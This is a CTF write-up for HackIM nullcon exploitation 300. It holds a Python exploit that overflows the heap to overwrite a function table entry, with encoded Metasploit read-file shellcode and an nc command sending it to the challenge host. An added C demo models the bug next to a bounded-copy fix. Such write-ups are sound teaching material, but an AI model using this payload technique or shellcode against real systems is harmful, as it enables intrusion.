HackIM nullcon exploitation 300 write-up

0x10 Information Security/0x15 System

by sweetchip 2014. 1. 27. 15:25


binary : vuln3


import struct

# createheap -> allocate_big_heap -> strcpy -> deleteheap(vtable)
# simple function pointer overwrite
# heap overflow

"""
/*
 * linux/x86/read_file - 97 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * VERBOSE=false, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependSetresgid=false, PrependSetregid=false,
 * PrependSetgid=false, PrependChrootBreak=false,
 * AppendExit=false, PATH=flag.txt, FD=4
 */
"""
shellcode = (b"\xb8\xf6\x7e\xa8\x82\xdd\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
             b"\x12\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x14\x8b\x43\xb4\x60"
             b"\x71\x94\xb9\x90\x21\xa5\x70\x5d\x55\x4c\x41\xe5\x55\x4f\x46"
             b"\x15\xd3\xa8\xcf\xec\x59\x36\xc0\x0e\x9e\xfa\x60\x87\x5c\xbc"
             b"\x65\x97\x60\xbd\xde\x93\x60\xbd\x20\x56\xe0\x05\x21\x68\xe1"
             b"\x75\x99\x68\xe1\x75\xdd\xa5\x61\x9d\x18\xca\x9d\xa1\xc5\x58"
             b"\x03\x39\x24\xd4\xbb\xb1\x38")

# pack a 32-bit little-endian value for the x86 target; the format string was
# swallowed by the blog's HTML in the original post and is restored here
p = lambda x: struct.pack("<I", x)

pr = 0x080487e8  # value written over the function table entry ("ret here")


def createheap():
    # create heap: "CR" command, 38 bytes of padding, then a size of 0x64
    payload = b"CR"
    payload += b"A" * 38
    payload += p(0x64)
    payload += b"\n"
    return payload


def deleteheap():
    # delete heap: triggers the call through the overwritten function table.
    # The "DE" command bytes are replaced by a short jump (jmp +0x50) that
    # skips the padding and size field and lands in the NOP sled.
    #payload = b"DE"
    payload = b"\xeb\x50"  # short jump
    payload += b"\x90" * 38
    payload += p(0x32)
    payload += b"\x90" * 0x50
    payload += shellcode
    payload += b"\n"
    return payload


def biggheap(size):
    # allocate big heap: "RE" command, size 0xc8, then `size` bytes of data
    # ending with the address that is later called ("ret here")
    payload = b"RE"
    payload += b"A" * 38
    payload += p(0xc8)
    payload += b"A" * 36
    payload += p(size)
    payload += b"\n"
    payload += b"B" * (size - 4 - 4)
    payload += p(pr)  # ret here
    payload += b"\n"
    return payload


def overflow():
    # lead to buffer overflow: copy 0x12c bytes into the 0x64-byte heap
    payload = b"CP"
    payload += b"A" * 38
    payload += p(0x12c)
    payload += b"\n"
    return payload


exploit = b""
exploit += createheap()
exploit += biggheap(0x110)
exploit += overflow()
exploit += deleteheap()  # trig vuln

#print(exploit)

f = open("ex3.txt", "wb")
f.write(exploit)
f.close()

"""
root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# (cat a.txt) | nc 23.23.190.205 8888
637c0c259175d230b08e3e589278ceeb
"""


Analyze the binary, then write exploit code that induces a heap overflow, overwrites the function table, and gets the program to call the overwritten address.
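The pattern the write-up exploits, modelled as an added example that is not the challenge binary and not sweetchip's exploit: two objects allocated back to back, a copy command that trusts the requested length instead of the destination's capacity (strcpy in the real binary), and a delete command that calls a function pointer stored in the neighbouring object. A bump allocator over a static arena replaces malloc() so the distance between the two objects is deterministic; the struct layout, the arena and the handler names are assumptions made for the demo, and the bounded copy_checked beside the unchecked one is the check the binary lacked.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef void (*handler_t)(void);

/* One heap object: capacity, the function table entry the delete command
   calls, then the user data. Assumed layout for this demo, not the
   challenge binary's real structure. */
struct heap_obj {
    size_t size;           /* capacity of data[] */
    handler_t on_delete;   /* called by delete_obj() */
    unsigned char data[];  /* user-controlled bytes */
};

/* Bump allocator over a static arena: objects sit back to back like
   consecutive malloc() chunks, minus the chunk headers. */
static union { unsigned char bytes[2048]; void *align; } arena_u;
static size_t arena_top;

static struct heap_obj *obj_alloc(size_t data_size, handler_t h)
{
    size_t need = (sizeof(struct heap_obj) + data_size + 15) & ~(size_t)15;
    if (arena_top + need > sizeof arena_u.bytes)
        return NULL;
    struct heap_obj *o = (struct heap_obj *)(arena_u.bytes + arena_top);
    arena_top += need;
    o->size = data_size;
    o->on_delete = h;
    memset(o->data, 0, data_size);
    return o;
}

static int marker_hits;                     /* times the hijacked call ran */
static void benign_handler(void) { }
static void attacker_handler(void) { marker_hits++; }  /* stands in for shellcode */

/* The write-up's bug: the copy command trusts the request length instead
   of the destination object's capacity. */
static void copy_unchecked(struct heap_obj *o, const unsigned char *src, size_t n)
{
    memcpy(o->data, src, n);
}

/* Hardened variant: refuse anything larger than the object can hold. */
static int copy_checked(struct heap_obj *o, const unsigned char *src, size_t n)
{
    if (n > o->size)
        return -1;
    memcpy(o->data, src, n);
    return 0;
}

static void delete_obj(struct heap_obj *o) { o->on_delete(); }

/* Filler up to the neighbour's on_delete slot, then the address to call:
   the same shape as the exploit's "B" * (...) + p(pr). */
static size_t build_payload(unsigned char *out, size_t cap,
                            const struct heap_obj *first,
                            const struct heap_obj *next, handler_t target)
{
    size_t off = (size_t)((const unsigned char *)&next->on_delete - first->data);
    size_t len = off + sizeof target;
    if (len > cap)
        return 0;
    memset(out, 'B', off);
    memcpy(out + off, &target, sizeof target);
    return len;
}

/* Replays the write-up's command order against the unchecked copy.
   Returns how many times delete_obj() ran the attacker's handler (1). */
int run_vulnerable(void)
{
    arena_top = 0;
    marker_hits = 0;
    struct heap_obj *small = obj_alloc(0x64, benign_handler);   /* CR */
    struct heap_obj *big   = obj_alloc(0xc8, benign_handler);   /* RE */
    unsigned char payload[512];
    size_t n = build_payload(payload, sizeof payload, small, big, attacker_handler);
    copy_unchecked(small, payload, n);  /* CP: longer than the 0x64-byte object */
    delete_obj(big);                    /* DE: calls the overwritten pointer */
    return marker_hits;
}

/* Same sequence with the bounded copy. Returns -1 if the oversized copy was
   wrongly accepted, otherwise how many times the attacker handler ran (0). */
int run_hardened(void)
{
    arena_top = 0;
    marker_hits = 0;
    struct heap_obj *small = obj_alloc(0x64, benign_handler);
    struct heap_obj *big   = obj_alloc(0xc8, benign_handler);
    unsigned char payload[512];
    size_t n = build_payload(payload, sizeof payload, small, big, attacker_handler);
    int rc = copy_checked(small, payload, n);  /* rejected: big is untouched */
    delete_obj(big);                           /* still calls benign_handler */
    return rc == 0 ? -1 : marker_hits;
}

int main(void)
{
    printf("unchecked copy: attacker handler ran %d time(s)\n", run_vulnerable());
    printf("checked copy:   attacker handler ran %d time(s)\n", run_hardened());
    return 0;
}
```

The demo keeps the same command order as the exploit (create, allocate big, copy, delete); the only thing that differs between the two runs is whether the copy is bounded by the destination's own size, which is exactly the check the challenge binary was missing.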



flag : 637c0c259175d230b08e3e589278ceeb
